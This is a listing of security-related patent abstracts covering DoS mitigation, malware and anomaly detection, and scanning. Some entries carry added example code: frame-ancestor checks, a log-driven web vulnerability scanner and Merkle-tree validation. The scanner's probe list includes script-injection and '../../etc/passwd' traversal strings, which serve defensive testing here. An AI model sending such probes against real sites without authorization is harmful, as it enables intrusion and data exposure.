20130125236RENDER ENGINE, AND METHOD OF USING THE SAME, TO VERIFY DATA FOR ACCESS AND/OR PUBLICATION VIA A COMPUTER SYSTEM - A method and system to verify active content at a server system include receiving, at the server system a communication (e.g., an e-mail message or e-commerce listing) that includes active content that is to be made accessible via the server system. At the server system, the active content is rendered to generate rendered active content. The rendered active content presents a representation of information and processes to which an end user will be subject. At the server system, the rendered active content is verified as not being malicious.05-16-2013
20130125235Method, Apparatus and Program for Detecting Spoofed Network Traffic - A method, an apparatus and a program for detecting spoofed Internet Protocol (IP) traffic directed to a network having a plurality of autonomous systems (AS) are provided. The method comprises receiving an incoming packet through an AS, the incoming packet containing a source IP address and a destination IP address, acquiring corresponding source and destination IP address prefixes, converting the corresponding source and destination IP address prefixes into a source AS number and a destination AS number, determining if the incoming packet arrived from an unexpected source based upon the corresponding destination IP address prefix and the converted source and destination AS numbers using an unexpected pair tuple table generated from network routing information, and generating an alert indicating that the incoming packet is not allowed to enter the network.05-16-2013
20130133064REVERSE NFA GENERATION AND PROCESSING - In a processor of a security appliance, an input of a sequence of characters is walked through a finite automata graph generated for at least one given pattern. At a marked node of the finite automata graph, if a specific type of the at least one given pattern is matched at the marked node, the input sequence of characters is processed through a reverse non-deterministic finite automata (rNFA) graph generated for the specific type of the at least one given pattern by walking the input sequence of characters backwards through the rNFA beginning from an offset of the input sequence of characters associated with the marked node. Generating the rNFA for a given pattern includes inserting processing nodes for processing an input sequence of patterns to determine a match for the given pattern. In addition, the rNFA is generated from the given type of pattern.05-23-2013
20130133065SYSTEM AND METHOD OF INDICATING THE STRENGTH OF ENCRYPTION - A method and system are provided for secure messaging on mobile computing devices. The method and system provide for an indication of a security trust level associated with a security method used with an electronic message.05-23-2013
20080209555Approach for proactive notification of contract changes in a software service - An approach is provided for proactive notification of contract changes in a software service. According to the approach, when the executable code of a composite application operable to access the service is generated, an initial copy of a contract that describes the service is retrieved. A baseline representation of the contract is generated based on the initial copy of the contract. When the composite application is being executed, a determination is made based on the baseline representation whether the contract has experienced any changes. In response to determining that the contract has experienced a change, a notification is sent indicating that the contract has experienced the change.08-28-2008
20110214180Network Amplification Attack Mitigation - An improved network protocol for mitigating network amplification attacks is provided. The absolute network load that any transient distributed attack can cause is bounded based on a resource crediting scheme. The protocol accumulates “credit” upon reception and detection of candidate attack request packets, and draws against that credit when transmitting responsive packets. In some implementations, the time frame of such an attack is also bounded using time limits applied to a resource crediting scheme. Other resources may also be bounded by the resource crediting scheme, including without limitation CPU utilization, storage capacity, power, etc.09-01-2011
20080201777Method and Agent for the Protection Against the Unauthorized Use of Computer Resources - Method and agent for preventing a hostile use of computer resources by an application running on a workstation. A list of services that are not allowed for access by unspecified applications is provided, and when such unspecified application runs on the workstation, the application is prevented from accessing any resource directly. Any direct or indirect request for access to specific services is analyzed, to determine whether such request is allowable according to the list. The workstation processes the request if it is allowable. The unspecified application is prevented from accessing the requested resource if the request is not allowable. The resource may be any local or remote resource, such as, memory allocation, files, directories, operations with files and directories, such as copy, delete or compress, or any other operation leading to a permanent change in the workstation or its periphery.08-21-2008
20080201776Method And Computing System For Avoiding Denial Of Service Attacks - A computing system configured to receive service requests, comprising a memory for storing service request data and a service request handler. The computing system is configured to respond to a service request by registering a call back routine configured to pass details of the service request to the memory if executed by a panic process upon a system crash, the memory is configured to store the details of the service request passed to it, and the service request handler is configured to compare the service request to the service request data in the memory and to deny the service request if the service request matches a predefined portion of the service request data.08-21-2008
20110225653MONITORING SYSTEM, PROGRAM-EXECUTING DEVICE, MONITORING PROGRAM, RECORDING MEDIUM AND INTEGRATED CIRCUIT - The aim is to provide a monitoring system and a program execution apparatus that are capable of maintaining the security intensity even in the case where an unauthentic install module is invalidated. Install modules 09-15-2011
20110225650SYSTEMS AND METHODS FOR DETECTING AND INVESTIGATING INSIDER FRAUD - Systems, methods, and apparatus, including computer programs encoded on computer storage media, for detecting insider fraud. One method includes identifying one or more insider threat detection rules for an enterprise and obtaining behavioral data for a first enterprise insider from multiple behavioral data sources. The enterprise is associated with a plurality of enterprise insiders, and the behavioral data describes at least one action of the first enterprise insider. The method further includes determining a threat score for the first enterprise insider based on the behavioral data for the first enterprise insider and one or more of the insider threat detection rules and initiating, when the threat score satisfies a threat threshold, one or more protective actions.09-15-2011
20130145464Network Overload Detection and Mitigation System and Method - Systems and methods are provided for detecting and mitigating overload conditions affecting one or more computers attached to a network, such as overloads resulting from distributed denial of service (DDoS) attacks, for example. According to some described embodiments, an attempted overload condition is detected, e.g., by a system, through following a method, or both, within a data cleaning center. Detection may be achieved, e.g., by analyzing data packets traveling over the network to identify packets that bear characteristics that may be associated with DDoS attacks, and this analysis may include examination of the packets' data payloads. Mitigation, in turn, may include discarding some data packets, redirecting network traffic, or some combination thereof.06-06-2013
20110239297TAMPERING MONITORING SYSTEM, CONTROL DEVICE, AND TAMPERING CONTROL METHOD - A management device detects whether any normal monitoring module that has not been tampered with exists by referring to monitoring results received from an information security device and selects, when existence is detected, one of the monitoring modules and assumes that the selected monitoring module has been tampered with. The management device then successively applies a procedure to monitoring modules other than the selected monitoring module by referring to the monitoring results, starting from the selected monitoring module, the procedure being to assume that any monitoring module determining that a monitoring module assumed to have been tampered with is normal has also been tampered with. As a result of the procedure, when all of the monitoring modules are assumed to have been tampered with, the management device determines the selected monitoring module to be a normal monitoring module that has not been tampered with.09-29-2011
20120278886DETECTION AND FILTERING OF MALWARE BASED ON TRAFFIC OBSERVATIONS MADE IN A DISTRIBUTED MOBILE TRAFFIC MANAGEMENT SYSTEM - Systems and methods for detection and filtering of malware based on traffic observations made in a distributed mobile traffic management system are disclosed. One embodiment of a method which can be implemented on a system includes collecting information about a request, or information about a response to the request, initiated at the mobile device and using the information collected about the request or the response to identify or to detect malicious traffic. The information that is collected about the request or the response received for the request initiated at the mobile device can be further used to determine cacheability of the response.11-01-2012
20120278885MAINTAINING DATA INTEGRITY - Aspects of the present invention maintain data integrity of a monitored data object in a monitored storage repository. A first security value for the monitored data object is determined. The first security value is stored along with an authentic copy of the monitored data object in the secure repository. The second security value for the monitored data object is determined after a predetermined time interval. The first security value is compared with the second security value. An alert is generated in response to determining a difference between the second security value and the first security value.11-01-2012
20130152195Replay Attack Protection With Small State For Use In Secure Group Communication - A replay detection technique with “small state” (e.g., with relatively few bits of state information). A sending node generates a random number r06-13-2013
20130152196THROTTLING OF ROGUE ENTITIES TO PUSH NOTIFICATION SERVERS - Techniques for throttling of rogue entities to push notification servers are described. An apparatus may comprise a processor and a memory communicatively coupled to the processor. The memory may store an application, the application maintaining a monitored domain table, the application maintaining an offending domain table, the application operative to receive an incoming request from a client in a domain, to detect harmful activity based on the request, and to respond to the harmful activity based on one or both of the monitored domain table and the offending domain table. Other embodiments are described and claimed.06-13-2013
20130152197EVENT DETECTION METHOD AND APPARATUS IN A DISTRIBUTED ENVIRONMENT - An event detection method in a distributed environment includes, when a non-parsable event occurs during grammar parsing, executing the following process until the first grammar parser module obtains a detection result: including the event that the current grammar parser module cannot parse in a scheduling request as the next event to be detected and sending it to the grammar control module; scheduling, by the grammar control module, another grammar parser module as the target grammar parser module for further parsing based on the scheduling strategy table; performing grammar parsing based on the local parsing table in the scheduled target grammar parser module; returning parsing results to the grammar control module for further parsing when no non-parsable event is found; or repeating the above process with the target grammar parser module as the new current grammar parser module when a non-parsable event is found.06-13-2013
20130152198Anomaly Detection To Implement Security Protection of a Control System - An anomaly detection mechanism is provided that detects an anomaly in a control network, and includes an identifying unit to receive event information on an event that occurs, and to identify a group including a resource related to the event information by referring to a configuration management database for retaining dependence relationships between processes and resources including a control system; a policy storing unit to store one or more policies each of which associates one or more actions with a condition defining a situation suspected to have an anomaly; an adding unit to acquire group-related information needed for application to the one or more policies, and to add the acquired information to the event information; and a determining unit to apply the event information to the one or more policies and to determine the one or more actions associated with the matched condition as one or more actions to be taken.06-13-2013
20100299753Method of Preventing TCP-Based Denial-of-Service Attacks on Mobile Devices - Provided is a method of preventing a Transmission Control Protocol (TCP)-based Denial of Service (DoS) attack on a mobile device. The method efficiently prevents a DoS attack on a mobile device, which wirelessly and constantly transmits TCP packets to the mobile device using a TCP protocol and thereby exhausts resources of a wireless network and also battery power of the mobile device depending on a battery. An attack conventionally made in a wired network by abusing TCP-based three-way handshaking is more severe in the wireless network of mobile devices. To prevent such an attack on a mobile device, the method capable of checking three-way handshaking and each transition operation makes the mobile device check whether or not a received TCP packet is valid. Therefore, it is possible to efficiently prevent a DoS attack from exhausting wireless resources and battery power of the mobile device.11-25-2010
20100299752Identification of Content - Systems and methods for identifying content in electronic messages are provided. An electronic message may include certain content. The content is detected and analyzed to identify any metadata. The metadata may include a numerical signature characterizing the content. A thumbprint is generated based on the numerical signature. The thumbprint may then be compared to thumbprints of previously received messages. The comparison allows for classification of the electronic message as spam or not spam.11-25-2010
20120260338ANALYSIS OF SCRIPTS - A method and system for analyzing scripts. A script is analyzed to determine whether the script includes malicious content. A computer executes at least two text blocks of code derived from a script of a web page. The execution of a text block of the at least two text blocks generates an additional text block of code. The computer determines whether the additional text block includes new code that is malicious. If so, the computer prevents transmission of the web page to a client computer. If not, the computer transmits the web page to the client computer.10-11-2012
20090144823Method and System for Mobile Network Security, Related Network and Computer Program Product - A honeypot system for protecting a mobile communication network against malware includes one or more user-less mobile devices including a monitoring module for monitoring the events conveying software applications in the associated mobile device as well as a controller client module that emulates human-like interaction with the user-less devices as a function of the events monitored. The system controllably performs, for the applications conveyed by the events monitored, one or more of the following steps: i) installing the application on the device; ii) executing the application installed on the device; and iii) de-installing the application from the device. After any of these steps, the state of the device is checked in order to detect if any anomalous variation has occurred in the state of the device indicative of the device being exposed to the risk of malware. If any anomalous variation is detected, the system issues a malware alert message.06-04-2009
20130205389DATA PROCESSING APPARATUS AND METHOD FOR PROTECTING SECURE DATA AND PROGRAM CODE FROM NON-SECURE ACCESS WHEN SWITCHING BETWEEN SECURE AND LESS SECURE DOMAINS - A data processing apparatus includes processing circuitry and a data store including a plurality of regions including a secure region and a less secure region. The secure region is configured to store sensitive data accessible by the circuitry when operating in a secure domain and not accessible by the circuitry when operating in a less secure domain. The data store includes a plurality of stacks with a secure stack in the secure region. Stack access circuitry is configured to store predetermined processing state to the secure stack. The processing circuitry further comprises fault checking circuitry configured to identify a first fault condition if the data stored in the predetermined relative location is the first value. This provides protection against attacks from the less secure domain, for example performing a function call return from an exception, or an exception return from a function call.08-08-2013
20130205388SELECTIVE RANDOMIZATION FOR NON-DETERMINISTICALLY COMPILED CODE - A method and an apparatus for runtime compilation that generates non-deterministic and unpredictable code to protect against un-trusted code attacks are described. The runtime compilation may be based on heuristic rules without requiring deterministic behavior reduction operations for all the code generated. The heuristic rules may include estimations on, for example, runtime overhead or cost incurred for code protection, amount of code protection required and/or other applicable factors and their relationships.08-08-2013
20100319069INTEGRATED CYBER NETWORK SECURITY SYSTEM AND METHOD - A computer system for providing security in a computer network includes: a global sensor device configured to determine potential threats to the computer network; a global threat manager device configured to determine identification information associated with the potential threats; and a local security device configured to detect the existence of the potential threats based on the identification information and to take remedial action in response to the potential threats. The system also provides for responding to network attacks in a sufficiently granular method that is optimized according to the current state of the network by maintaining a virtual model of the network; detecting a network attack; generating a plurality of alternative candidate remedial responses to the network attack; and determining a potential network impact of each candidate remedial response using the virtual model of the network.12-16-2010
20120284792System and Method for Aggressive Self-Modification in Dynamic Function Call Systems - Provided are a system and method for software obfuscation for transforming a program from a first form to more secure form that is resistant to static and dynamic attacks. The method utilizes a sophisticated pre-analysis step to comprehend the function-call structure, the function-call layout, and the entire function call graph of the program, in order to determine strategic points in the program for changing the program. This provides resistance to static attacks by transforming the original function-call layout to a new layout. Changing the layout may include changing the function boundaries. The method also provides resistance to static attacks by transforming the original function-call structure to a new structure to be able to self modify as the transformed program executes in memory. Changing the function-call structure may include modifying when and how functions are called, and/or choosing random paths of execution that lead to the same result.11-08-2012
20120284791ROBUST ANOMALY DETECTION AND REGULARIZED DOMAIN ADAPTATION OF CLASSIFIERS WITH APPLICATION TO INTERNET PACKET-FLOWS - Sound, robust methods identify the most suitable, parsimonious set of tests to use with respect to prioritized, sequential anomaly detection in a collected batch of sample data. While the focus is on detecting anomalies in network traffic flows and classifying network traffic flows into application types, the methods are also applicable to other anomaly detection and classification application settings, including detecting email spam, (e.g. credit card) fraud detection, detecting imposters, unusual event detection (for example, in images and video), host-based computer intrusion detection, detection of equipment or complex system failures, as well as of anomalous measurements in scientific experiments.11-08-2012
20120284790LIVE SERVICE ANOMALY DETECTION SYSTEM FOR PROVIDING CYBER PROTECTION FOR THE ELECTRIC GRID - Provided is a method of improving security in an electrical grid network. The method includes configuring a lifecycle map associated with an operation in the electrical grid network, the lifecycle map including at least a start configuration, a final configuration, and a plurality of valid events arranged to link the start configuration and the final configuration, the start configuration and the final configuration corresponding to particular states of the electrical grid network. The method also includes monitoring at least one of messages and device configurations in the electrical grid network to detect one or more live events associated with the operation and comparing the plurality of live events to the lifecycle map to identify an anomaly in the live events.11-08-2012
20130160115SANDBOXING FOR MULTI-TENANCY - Systems and methods according to various embodiments disclose a worker process manager adapted to spawn one or more worker processes on a server and to load an application on each of the worker processes. The worker process manager is adapted to isolate the one or more worker processes from each other and to control resource usage by the worker processes. A resource manager is adapted to detect applications that overuse system resources. The worker process manager is adapted to isolate worker processes and to control resource usage using one or more of the following techniques: least-privilege execution, messaging isolation, credentials isolation, data isolation, network isolation, fair share resource usage, and managed runtime security. Heuristic algorithms are used to detect applications that frequently overuse system resources that are unchargeable and that cause system unresponsiveness.06-20-2013
20130160118Methods, Communication Networks, and Computer Program Products for Monitoring, Examining, and/or Blocking Traffic Associated with a Network Element Based on Whether the Network Element Can be Trusted - A communication network is operated by determining whether a network element can be trusted and monitoring traffic associated with the network element based on whether the network element can be trusted. At least some of the monitored traffic may be selected for examination based on the degree of trust for the network element. At least some of the monitored and/or examined traffic is selected to be blocked based on the degree of trust for the network element.06-20-2013
20130185794BASE STATION FOR DETECTING DENIAL-OF-SERVICE ATTACKS IN COMMUNICATION SYSTEM AND METHOD FOR CONTROLLING THE SAME - Provided is a base station for detecting Denial-of-Service (DoS) attacks in a communication system and a method for controlling the same. The base station includes a first estimator for estimating, for a predetermined time, a reception rate of data that is received at the base station from a communication network to be transmitted to at least one wireless terminal; a second estimator for estimating, for a predetermined time, a bandwidth allocated for transmission of data to the at least one wireless terminal, based on at least one of feedback information transmitted from the at least one wireless terminal and channel capacity of the base station; and a controller for calculating a ratio of the bandwidth to the reception rate for the at least one wireless terminal, and determining whether there is a DoS attack, using the calculated ratio.07-18-2013
20130185793Apparatus and Method for Tracking Network Path - An apparatus and method for effectively tracking a network path by using packet information generated when visiting a Web page are provided.07-18-2013
20110307953Radio Channel Metrics for Secure Wireless Network Pairing - Technologies are generally described for using metrics of radio path characteristics within a wireless network to establish signal signature vectors. These signal signature vectors may be used as a shared secret between network nodes to establish affirmative identification. For example, a signal signature vector may be established when a new node sends a fixed number of packets to the existing nodes and the existing nodes send a fixed number of other packets back to the new node. The number of properly received packets can be counted to establish a success probability between the new node and each existing node. These probabilities can be normalized and quantized to generate signal signature vectors at each node. Without ever transmitting any of the vectors, the vector at the new node should be highly correlated to the vectors at existing nodes since the pair-wise channels between each of the nodes should be reasonably symmetrical.12-15-2011
20110321162Methods And Systems For Providing Security For Page Framing - Techniques for analyzing a page to be presented by a browser running on a computing platform. The page is disabled. The page is tested to determine if the page is framed by a second page. The page is enabled if the testing indicates that the page is not framed by a second page. Each level of a hierarchy of framed pages is inspected to determine whether each level is authorized. The page is enabled if the inspecting indicates that each level of the hierarchy of framed pages is authorized.12-29-2011
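The authorization walk described in the page-framing entry above, as an added example (not code from the patent or any product): the page stays disabled until either it is found to be top-level or every framing level is on an allowlist. The allowlist, the origin normalization and the innermost-first ordering of ancestors are assumptions; in a browser the ordering matches what Location.ancestorOrigins reports.

```python
from urllib.parse import urlsplit

# Constructed allowlist of origins permitted to frame this page (assumption,
# not a value taken from the patent).
ALLOWED_FRAMERS = {"https://app.example.com", "https://portal.example.com"}


def normalize_origin(origin: str) -> str:
    """Reduce an origin or URL to lowercase scheme://host[:port].

    Opaque origins (sandboxed frames, data: URLs) are reported by browsers as
    the literal string "null"; anything that does not parse is treated the
    same way so it can never match an allowlist entry.
    """
    if not origin or origin == "null":
        return "null"
    parts = urlsplit(origin)
    if not parts.scheme or not parts.hostname:
        return "null"
    port = f":{parts.port}" if parts.port else ""
    return f"{parts.scheme.lower()}://{parts.hostname.lower()}{port}"


def inspect_frame_hierarchy(ancestor_origins, allowed):
    """Decide whether a page may be enabled given the origins framing it.

    ancestor_origins lists the framing pages innermost parent first (the
    order Location.ancestorOrigins uses); an empty list means the page is
    top-level, i.e. not framed, and is enabled immediately. Otherwise every
    level must be on the allowlist; the first unauthorized level stops the
    walk and the page stays disabled. Returns (enable_page, reason).
    """
    if not ancestor_origins:
        return True, "not framed"
    allowed_norm = {normalize_origin(a) for a in allowed}
    for depth, origin in enumerate(ancestor_origins, start=1):
        norm = normalize_origin(origin)
        if norm == "null" or norm not in allowed_norm:
            return False, f"framing level {depth} ({origin!r}) is not authorized"
    return True, f"all {len(ancestor_origins)} framing levels authorized"
```

In a browser the same check would receive Array.from(location.ancestorOrigins) as its first argument, with the page body kept hidden until it returns True. Where a page only needs to refuse framing outright, the Content-Security-Policy frame-ancestors directive lets the browser enforce the same policy without any script, which also covers clients that have script disabled.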
20110321161MITIGATING EXCESSIVE OPERATIONS ATTACKS IN A WIRELESS COMMUNICATION NETWORK - A technique for mitigating excessive operations attacks in a wireless communication network includes receiving message requests from stations, detecting an excessive operation attack, checking if a received request is a first request or a retry request, and ignoring any first requests. The method can also include saving information about the first request, and wherein if checking reveals that the received request is a retry request, the method further confirms that the retry request and the saved information about the first request meet matching conditions, whereupon the retry request is further processed as normal. Since attacks rarely utilize retry requests, this technique effectively ignores attack messages.12-29-2011
20110321160SYSTEMS AND METHODS TO DETECT MALICIOUS MEDIA FILES - Systems and methods to detect malicious media files are described. In one example, an apparatus including a network connection, a memory, and a programmable processor communicatively coupled to the memory is discussed. The memory can include instructions, which when executed by the programmable processor cause the apparatus to receive a data stream from the network connection and detect at least a portion of a media file within the data stream. The instructions can also cause the apparatus to determine a file type of the media file and extract the media file from the data stream. Further, the instructions cause the apparatus to parse the media file to locate a suspicious tag, extract an embedded URL from the suspicious tag, determine whether the embedded URL is malicious, and block the media file if the embedded URL is malicious.12-29-2011
20130191914CLOUD-BASED GATEWAY SECURITY SCANNING - Some embodiments of cloud-based gateway security scanning have been presented. In one embodiment, some data packets are received sequentially at a gateway device. The data packets constitute at least a part of a file being addressed to a client machine coupled to the gateway device. The gateway device forwards an identification of the file to a remote datacenter in parallel with forwarding the data packets to the client machine. The datacenter performs signature matching on the identification and returns a result of the signature matching to the gateway device. The gateway device determines whether to block the file from the client machine based on the result of the signature matching from the datacenter.07-25-2013
20130191912SECURE NETWORK TOPOLOGY ON A VIRTUALIZED SERVER - Generally, this disclosure describes a secure network topology on a virtualized server (and methods thereof). A virtualization management module is deployed as part of a software layer of a virtualized server system. The virtualization management module generates an internal network among the virtual machines and controls access to the network. The virtualization management module translates incoming and outgoing traffic between the virtual machines and an external internet IP address, thus keeping the virtual machines indirectly coupled to the external network. The virtualization management module also provides remote administration and control over each virtual machine (or collection of virtual machines).07-25-2013
20130191913DYNAMICALLY SCANNING A WEB APPLICATION THROUGH USE OF WEB TRAFFIC INFORMATION - Collecting log file data from at least one log file. From the collected log file data, at least one HTTP request can be generated to exercise a web application to perform a security analysis of the web application. The HTTP request can be communicated to the web application. At least one HTTP response to the HTTP request can be received. The HTTP response can be analyzed to perform validation of the web application. Results of the validation can be output.07-25-2013
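The log-driven scanning loop in the entry above, as an added example (not the patent's or any product's code): parse web-server log lines, collapse them into one request template per entry point, derive probe requests from the observed parameters, and validate each response. The combined log format, the probe payloads and the reflection check are assumptions; the log lines are constructed, not captured traffic, and the example stops short of actually sending the requests so that it runs offline.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Matches the Apache/nginx "combined" log format (an assumption about the
# log source; other formats need their own pattern).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines, not captured traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Jul/2013:10:01:02 +0000] "GET /search?q=books&page=2 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.6 - - [25/Jul/2013:10:01:07 +0000] "GET /item/42 HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.0.0.5 - - [25/Jul/2013:10:01:09 +0000] "GET /search?q=books&page=3 HTTP/1.1" 200 5201 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Jul/2013:10:01:11 +0000] "POST /login HTTP/1.1" 302 0 "-" "curl/7.29"
this line is not in the expected format and is skipped
"""

# Probe values substituted into observed parameters (assumption: a small
# representative set; a real scanner carries a much larger payload list).
PROBE_VALUES = ["'", "\"><script>1</script>", "../../etc/passwd"]


def parse_log(text):
    """Yield one dict per parsable request line; unparsable lines are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        entry = m.groupdict()
        url = urlsplit(entry["target"])
        entry["path"] = url.path
        entry["params"] = dict(parse_qsl(url.query, keep_blank_values=True))
        yield entry


def build_templates(entries):
    """Collapse traffic into one request template per (method, path, parameter
    names), so each distinct entry point is exercised once regardless of how
    many times the logs show it."""
    templates = {}
    for e in entries:
        key = (e["method"], e["path"], tuple(sorted(e["params"])))
        t = templates.setdefault(
            key, {"method": e["method"], "path": e["path"], "params": dict(e["params"]), "seen": 0}
        )
        t["seen"] += 1
    return list(templates.values())


def generate_probes(template):
    """Return request variants with one parameter at a time replaced by a probe."""
    probes = []
    for name in template["params"]:
        for value in PROBE_VALUES:
            params = dict(template["params"])
            params[name] = value
            probes.append({"method": template["method"], "path": template["path"],
                           "params": params, "probe": value, "param": name})
    return probes


def analyze_response(probe, status, body):
    """Validate one response: flag a server error, or the probe echoed back
    unencoded, which is what a reflected-injection check looks for."""
    findings = []
    if status >= 500:
        findings.append(f"{probe['param']}: server error {status}")
    if probe["probe"] in body:
        findings.append(f"{probe['param']}: probe reflected unencoded")
    return findings
```

The templates are the scan's coverage map: requests seen in production logs reach code paths a crawler never finds (deep-linked pages, POST targets), and the "seen" count lets the scanner prioritize the busiest entry points first.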
20120291126Balancing Malware Rootkit Detection with Power Consumption on Mobile Devices - The subject disclosure presents a novel technique for balancing the tradeoff between security monitoring and energy consumption on mobile devices. Security/energy tradeoffs for host-based detectors focusing on rootkits are analyzed along two axes: a scanning frequency, and a surface of attack. Experimental results are applied to a hypervisor-based framework, and a sweet spot is identified to minimize both energy consumption and a window of vulnerability for critical operating system objects such as code pages and kernel data.11-15-2012
20120291125DYNAMIC AND SELECTIVE RESPONSE TO CYBER ATTACK FOR TELECOMMUNICATIONS CARRIER NETWORKS - The disclosed subject matter provides a response to a cyber attack on a carrier network. The response can be based on inspection of traffic flowing through a carrier network. The response can automatically adapt the traffic flow in response to a perceived threat. Traffic can be adapted by dynamically updating permission variables related to allowing access for user equipment (UE) to a carrier network, withdrawing or denying access to the carrier network for selected UEs. In other embodiments, signaling can be initiated at the carrier network to cause selected UEs to disable transmission of traffic contributing to the traffic flow. Determining a cyber attack condition can be based on predetermined rules associated with the traffic flow. Further, the determination can be performed at a front end of the carrier network to limit exposure of the carrier network to a detected cyber attack.11-15-2012
20120291124CARRIER NETWORK SECURITY INTERFACE FOR FIELDED DEVICES - The disclosed subject matter provides carrier-side security services for fielded devices. In contrast to conventional authentication systems for fielded devices, wherein an end-to-end communications pathway is typically established for authentication of a fielded device by a back-end service provider, authentication and security services can be moved into the carrier network. A security service monitor component can be at the carrier network and can authenticate field components without establishing a communications pathway to the back-end service provider. Further, security service monitor component can provide security services for communications with an authenticated field component. In an aspect, this can allow for centralization of security elements from the periphery of back-end service providers into the carrier network. In a further aspect, security service monitor component can host a security services platform for back-end service providers.11-15-2012
20120017274WEB SCANNING SITE MAP ANNOTATION - A computerized website vulnerability scanner includes a scanning module operable to navigate through a website and scan the website for vulnerabilities, and an annotation module operable to present a map of web pages comprising a part of the website. The annotation module is also operable to receive annotations from a user that are associated with the web pages, and the scanning module is further operable to use the user-provided annotations in subsequently scanning the website.01-19-2012
20120023576INSIDER THREAT CORRELATION TOOL - Systems and methods for calculating threat scores for individuals within an organization or domain are provided. Aspects of the invention relate to computer-implemented methods that form a predictive threat rating for user accounts. In one implementation, a threat score representing a first time period may be calculated. The first threat score may be calculated from a quantification of a plurality of activity violations across a plurality of control groups. Weighting schemes may be applied to certain activities, controls, and/or user accounts. Further embodiments may be configured to consider additional indicators. Further aspects relate to apparatuses configured to execute methods for ranking individual user accounts. Certain embodiments may not block transmissions that violate predefined rules, however, indications of such improper transmission may be considered when constructing a threat rating.01-26-2012
20120030758Automated Diversity Using Return Oriented Programming - A method of automatically creating functionally and structurally diverse equivalent copies of software executables using return oriented programming for the purpose of passing through a filter and other purposes includes starting with a program and a target runtime environment, creating a return oriented instruction library having a plurality of code fragments which end in a ‘return’ instruction from the program and chaining fragments together to automatically form diverse equivalent copies of software executables using return oriented programming.02-02-2012
20120030757LOGIN INITIATED SCANNING OF COMPUTING DEVICES - Embodiments of the invention relate to systems, methods, and computer program products for login initiated remote scanning of computer devices. The present invention detects login to the network via access management systems. The login data provides information that identifies the device so that the device can be checked against a scan database to determine if and when a previous scan occurred. Based on the findings in the scan database, determinations are made as to whether to perform a scan. Additionally, the level of scanning can be determined based on previous scan dates and previous scan results, which may dictate customized scanning. In addition, the priority of the impending scan may be dictated by previous scan dates and results. Further embodiments provide for assessing risk, such as risk scoring or the like, concurrently or in near-real-time with the completion of the scan so that alerts may be communicated.02-02-2012
20130198840SYSTEMS, METHODS AND COMPUTER PROGRAMS PROVIDING IMPACT MITIGATION OF CYBER-SECURITY FAILURES - Disclosed is a method and system to operate a governed data processing system in concert with a governing data processing system. The method includes operating a secure governing data processing system to monitor operation of at least one governed data processing system to detect a deviation from modeled user and governed data processing system behavior. The method further includes, upon detecting a deviation from the modeled behavior, taking proactive action to mitigate an occurrence of a potential adverse result of an occurrence of a cyber-security threat.08-01-2013
20130198838METHOD AND APPARATUS FOR PROVIDING SECURITY TO DEVICES - Systems, methods, and apparatus are provided for generating verification data that may be used for validation of a wireless transmit-receive unit (WTRU). The verification data may be generated using a tree structure having protected registers, represented as root nodes, and component measurements, represented as leaf nodes. The verification data may be used to validate the WTRU. The validation may be performed using split-validation, which is a form of validation described that distributes validation tasks between two or more network entities. Subtree certification is also described, wherein a subtree of the tree structure may be certified by a third party.08-01-2013
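The tree-structured verification data in the entry above, as an added example (not the patent's or any vendor's code): component measurements are the leaves, internal nodes hash their children, and the root is the value that would sit in a protected register. The same audit-path routine serves a single component (start at level 0) and a whole subtree (start higher up), which is what makes split validation possible: a verifier that trusts a third party's certificate on a subtree needs only the path from that subtree to the root. The measurements are constructed strings, the leaf/node domain separation is a design choice, and the HMAC standing in for the third party's signature is an assumption so the example runs offline.

```python
import hashlib
import hmac

# Constructed component measurements (assumption: on a real WTRU these are
# hashes of firmware/software components taken at boot, not these strings).
MEASUREMENTS = [b"bootloader:v1", b"kernel:4.4", b"firmware:baseband",
                b"firmware:wifi", b"app:dialer"]

# Key of a hypothetical third-party certifier; an HMAC stands in for its
# signature so the example runs offline (assumption).
CERTIFIER_KEY = b"third-party-certifier-key"


def leaf_hash(measurement: bytes) -> bytes:
    # Domain-separate leaves from internal nodes so a node can't be passed off as a leaf.
    return hashlib.sha256(b"\x00" + measurement).digest()


def node_hash(left: bytes, right: bytes) -> bytes:
    return hashlib.sha256(b"\x01" + left + right).digest()


def build_tree(measurements):
    """Return the tree as a list of levels: levels[0] are the leaf hashes,
    levels[-1] holds the single root that would be stored in a protected
    register. An odd level is extended by duplicating its last node."""
    level = [leaf_hash(m) for m in measurements]
    levels = [level]
    while len(level) > 1:
        if len(level) % 2:
            level = level + [level[-1]]
        level = [node_hash(level[i], level[i + 1]) for i in range(0, len(level), 2)]
        levels.append(level)
    return levels


def audit_path(levels, level_idx, index):
    """Sibling hashes needed to climb from node `index` at `level_idx` to the
    root, as (sibling_hash, sibling_is_left) pairs. level_idx=0 proves a
    single component; a higher level proves a whole subtree."""
    path = []
    for lvl in range(level_idx, len(levels) - 1):
        level = levels[lvl]
        if len(level) % 2:          # same padding rule as build_tree
            level = level + [level[-1]]
        sibling = index ^ 1
        path.append((level[sibling], sibling < index))
        index //= 2
    return path


def recompute_root(node: bytes, path) -> bytes:
    for sibling, sibling_is_left in path:
        node = node_hash(sibling, node) if sibling_is_left else node_hash(node, sibling)
    return node


def certify_subtree(subtree_root: bytes, key: bytes) -> bytes:
    return hmac.new(key, subtree_root, hashlib.sha256).digest()


def validate_split(register_root, subtree_root, certificate, path, key) -> bool:
    """Split validation: the verifier checks the third party's certificate on
    the subtree and then only needs the path from that subtree to the root,
    never the individual measurements inside it."""
    if not hmac.compare_digest(certify_subtree(subtree_root, key), certificate):
        return False
    return hmac.compare_digest(recompute_root(subtree_root, path), register_root)
```

The duplicate-last-node padding is the part to get right on both sides: the prover and verifier must pad identically or audit paths for the last leaf of an odd level fail to reproduce the root, and a verifier that silently accepts a mismatch defeats the purpose of the register.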
